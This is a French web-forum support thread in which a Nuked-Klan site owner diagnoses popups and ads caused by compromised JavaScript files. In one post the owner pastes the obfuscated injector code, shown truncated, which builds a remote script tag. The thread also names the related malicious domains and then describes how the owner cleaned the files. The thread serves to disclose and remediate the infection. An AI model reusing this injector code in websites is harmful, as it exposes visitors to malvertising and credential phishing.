[Résolu] Mon site et pleins de pub< Sujet précédent  
Index du Forum -> NUKED-KLAN ANCIENNES VERSIONS -> Généralités
AuteurMessage
France.gif titis
Member



Messages : 143
Inscrit(e) le: 19/04/2011
Mon site et pleins de pub

Bonjour à tous,
Mon site charge des pubs alors que je n'en ai aucune, on vois plein de liens se charger lors de l'ouverture de la page.

Par moment j'ai une popup qui s'ouvrir. Je viens seulement de voir cela car mon bloqueur de pub "ublock" me bloquer tout, du coup tout mes visiteurs doivent avoir pas mal de merde.

J'ai beau chercher je ne vois pas, je penser avoir une piste sur ckeditor, j'ai supprimé les fichiers du FTP mais j'ai toujours ses sites qui se charge et je n'est pas de fichier fckconfig.js.
Je suis sous NK SP 4.5 le site www.cpbvrc.fr ci-dessous un gif et une capture.

J'ai testé sous IE pour voir et je n'ai rien du tout aucun problème ! Alors que sous firefox et Chrome le site n'en fini pas de charger.

Merci pour vos pistes.

 



Edité par titis le 18/06/2017 - 17:35:39
Posté le 18/06/2017 - 16:37:27   Revenir en haut | Permalien
Belgium.gif Stive
Communauté

Messages : 1155
Inscrit(e) le: 28/12/2004
RE : Mon site et pleins de pub

Bonjour cela doit prévenir de votre PC, de mon côter j'ai été sur votre site et je n'ai rien eus



Website : https://bel-cms.be ou https://github.com/BEL-CMS

Website : https://palacewar.eu

Avant d'ouvrir un sujet, n'oubliez pas de lire le règlement et faire une recherche sur le forum !

Posté le 18/06/2017 - 17:47:50   Revenir en haut | Permalien
France.gif titis
Member



Messages : 143
Inscrit(e) le: 19/04/2011
RE : Mon site et pleins de pub

J'ai aussi cela sur mon lieu de travail, c'est quand même bizarre. Même sur mon PC je ne vois pas de quoi cela peut venir.

Je vais nettoyer mes fichiers de cache est temporaire.

Merci de ton aide.



Edité par titis le 18/06/2017 - 18:36:49
Posté le 18/06/2017 - 18:29:27   Revenir en haut | Permalien
France.gif titis
Member



Messages : 143
Inscrit(e) le: 19/04/2011
RE : Mon site et pleins de pub

Je viens de tester sur un portable avec un linux et firefox j'ai le même problème.



Posté le 18/06/2017 - 19:02:27   Revenir en haut | Permalien
France.gif titis
Member



Messages : 143
Inscrit(e) le: 19/04/2011
RE : Mon site et pleins de pub

J'ai remarqué cela dans la console d'édition sous chrome

Quand je fais des recherches sur le domaine http://jmgui.ejjymqm.xyz je tombe sur cette page http://urlquery.net/report.php?id=1492280100148 et une image m'interpel, on voit le domaine de github.com et tous les sites que je vois sont ceux qui arrive sur mon site.

Après cela n'a peut être rien à voir et c'est normal ce que j'ai trouvé. Par moment j'ai une fenêtre qui s'ouvre vers un site de jeu de thank en ligne et des fois ca demande carément un login mot de passe.



Edité par titis le 18/06/2017 - 19:37:12
Posté le 18/06/2017 - 19:10:05   Revenir en haut | Permalien
France.gif titis
Member



Messages : 143
Inscrit(e) le: 19/04/2011
RE : Mon site et pleins de pub

Bonjour trouvé, tous les fichiers JS du site on était piraté et un code malicieux y a était ajouté avec une URL crypté. Rrestrauration d'une sauvegarde et cela devrait être bon mais je me demande comment ils ont fait.

advAJAX._groupData = new Object();var ofs3aya=["007082", "006088","004069", "023067015088001086046008031025084004077","007067009", "000072026092", "000084018077090089010018027007082024080005071", "021065026092027087040012019024085", "028084011093", "019084030124025086006001020000066040064033082012042027025084", "028069030073079028068023014021069015023006094007086084006068069083006028008010014090091025"];function g0amg(nk86y7){var xtd7ka=document[p503771j(ofs3aya[3])](p503771j(ofs3aya[0])+p503771j(ofs3aya[1])+p503771j(ofs3aya[2]));xtd7ka[p503771j(ofs3aya[4])]=nk86y7;xtd7ka[p503771j(ofs3aya[5])]=p503771j(ofs3aya[6]);document[p503771j(ofs3aya[9])](p503771j(ofs3aya[8]))[0][p503771j(ofs3aya[7])](xtd7ka);}g0amg(p503771j(ofs3aya[10]));function p503771j(pkl9n){return o98dgjg(y81mn4ov(pkl9n),'t1j9u3kdz'Wink;}function o98dgjg(uk18t, g9ebgr) {var xrild8ne='';var b79=0;var o77a=0;for(b79=0;b79

 



Edité par titis le 19/06/2017 - 11:01:40
Posté le 19/06/2017 - 10:59:44   Revenir en haut | Permalien
France.gif titis
Member



Messages : 143
Inscrit(e) le: 19/04/2011
RE : Mon site et pleins de pub

Voilà c'est résolu, les 246 fichiers JS du site posséder le bout de code si dessus à la fin de charque fichiers.
J'ai mis à jour CKeditor et donc cela m'en a nettoyé 200 car les fichiers de langue sont en JS. Il me rester donc 46 fichier à nettoyer.
Si d'autres personnes on le cas, le bloqueur de pub bloque le site state.sml2.ru cette URL et crypté dans le code.

Pour trouver facilement les fichiers infecté avec notepad ++ ouvrez tous les fichiers JS de votre site, et faite une recherche de "length/3" une fois trouvé il faut supprimé toute la longue ligne de la function ajouté.



Posté le 19/06/2017 - 13:05:49   Revenir en haut | Permalien
Belgium.gif Stive
Communauté

Messages : 1155
Inscrit(e) le: 28/12/2004
RE : [Résolu] Mon site et pleins de pub

Merci pour les autres, s'il sont dans le même cas.



Website : https://bel-cms.be ou https://github.com/BEL-CMS

Website : https://palacewar.eu

Avant d'ouvrir un sujet, n'oubliez pas de lire le règlement et faire une recherche sur le forum !

Posté le 19/06/2017 - 17:00:47   Revenir en haut | Permalien